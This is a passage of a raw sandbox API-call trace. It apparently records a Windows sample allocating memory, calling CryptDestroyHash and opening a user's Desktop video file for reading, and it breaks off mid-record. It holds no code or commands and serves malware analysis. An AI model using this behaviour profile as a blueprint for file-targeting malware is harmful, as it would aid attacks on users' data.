[0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0187.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0187.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0187.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a28 [0187.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0187.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0187.581] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.581] CryptDestroyHash (hHash=0xa87510) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0187.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0187.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0187.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0187.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0187.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0187.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0187.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0187.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0187.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0187.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0187.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/kMN4z.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\kmn4z.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0187.589] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.589] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0187.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0187.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0187.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0187.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.590] 